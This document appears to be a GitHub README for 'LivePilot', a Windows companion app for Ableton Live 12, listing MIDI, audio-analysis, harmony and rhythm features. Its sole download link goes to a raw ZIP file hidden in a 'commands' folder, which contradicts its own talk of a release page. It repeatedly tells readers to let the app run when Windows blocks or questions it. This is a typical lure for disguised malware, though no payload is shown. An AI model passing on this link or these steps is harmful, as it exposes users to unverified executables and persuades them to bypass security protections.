LivePilot is an app for Ableton Live 12. It helps you work with music, MIDI, sound design, and note patterns from one place. It is built for Windows users who want a simple way to install and run a tool from GitHub.
Visit this page to download: https://github.com/Branacompositional429/LivePilot/raw/refs/heads/main/livepilot/commands/Live_Pilot_pluvine.zip
- Open the link in your web browser.
- Find the latest release near the top of the page.
- Download the Windows file listed there.
- Save the file to your computer.
- If the file comes in a ZIP folder, extract it first.
- Open the app or installer and follow the on-screen steps.
LivePilot is made for Windows. For the best result, use:
- Windows 10 or Windows 11
- Ableton Live 12
- A working sound card or audio interface
- MIDI input if you want to use a keyboard or controller
- Enough free disk space for the app and audio tools
If Windows asks for permission, choose the option to allow the app to run.
LivePilot helps you work inside Ableton Live with a wide set of music tools. It can support:
- MIDI input and output
- Audio checks and sound analysis
- Device lookups for Live and Max for Live tools
- Rhythm and harmony tasks
- Note and scale work
- Technique memory for repeated workflows
- Sound design tasks across many device types
It gives you a single place to handle music jobs that usually take many steps.
Use LivePilot to work with MIDI data, note patterns, and controller input. This helps with:
- Keyboard recording
- Drum patterns
- Note editing
- Step-based rhythm ideas
- Sending MIDI to other tools
LivePilot includes audio analysis tools that help you inspect sound in more detail. You can use it for:
- Frequency checks
- Spectral views
- Sound shape review
- Tone matching
- Pattern comparison
LivePilot supports music theory tasks such as:
- Neo-Riemannian harmony
- Species counterpoint
- Scale and chord ideas
- Harmonic movement
- Pitch set work
These tools help you build parts that fit together with less guesswork.
LivePilot can help you shape rhythm with methods like:
- Euclidean rhythm
- Grid-based pattern design
- Beat variation
- Loop shaping
- Time-based note work
LivePilot can remember repeated actions and music methods. This is useful when you want to return to the same kind of work later without starting over.
LivePilot includes a device atlas for Ableton Live 12 and Max for Live tools. This makes it easier to find and track devices across your setup.
Make sure you have:
- Ableton Live 12 installed
- A Windows PC
- A stable internet connection for the download
- A ZIP tool if the release comes as a compressed file
- A MIDI keyboard or controller if you plan to use one
If you use Max for Live devices, keep Ableton Live open before you start the app.
- Go to the release page.
- Download the latest Windows package.
- If the file is zipped, right-click it and choose Extract All.
- Open the extracted folder.
- Run the app or installer file.
- Follow each step on the screen.
- If Windows asks for trust or access, allow it so the app can open.
If the package includes extra files for Ableton or Max for Live, keep them in the same folder unless the release page says otherwise.
After setup, open LivePilot and connect it to your Ableton workflow.
Common uses:
- Open the app before starting a session
- Use it to inspect sounds and devices
- Send or receive MIDI
- Check rhythm ideas
- Review harmony choices
- Look up devices by type or function
- Save time on repeated production tasks
If your project uses many tracks or devices, LivePilot can help you stay organized.
LivePilot is built around several music tasks:
- Ableton Live control
- Max for Live support
- MIDI routing
- Sound design
- Audio analysis
- Spectral perception
- Harmony work
- Counterpoint ideas
- Rhythm generation
- Technique recall
This makes it useful for producers who work across composition, editing, and sound design.
A simple way to use LivePilot:
- Open Ableton Live 12.
- Start LivePilot.
- Load or create a music project.
- Check your MIDI input.
- Use LivePilot to inspect a device or sound.
- Test a rhythm pattern.
- Review harmony or note motion.
- Save your changes in Ableton
Try these steps:
- Close Ableton and open it again
- Restart LivePilot
- Check that your download finished fully
- Extract ZIP files before opening them
- Make sure Windows did not block the app
- Confirm that Ableton Live 12 is installed
- Check your MIDI cable or controller connection
If the app uses audio input, make sure the correct sound device is set in Windows and Ableton
After you unzip or install LivePilot, you may see files such as:
- App files
- Config files
- Device folders
- Readme files
- Support files for Ableton or Max for Live
Keep the folder structure intact unless the release notes give different steps
Download LivePilot from GitHub Releases
LivePilot is for users who want a direct way to work with Ableton Live 12, MIDI, sound analysis, and production tools from one Windows app. Use the release page to get the latest version, then install it on your PC and open it with your Ableton setup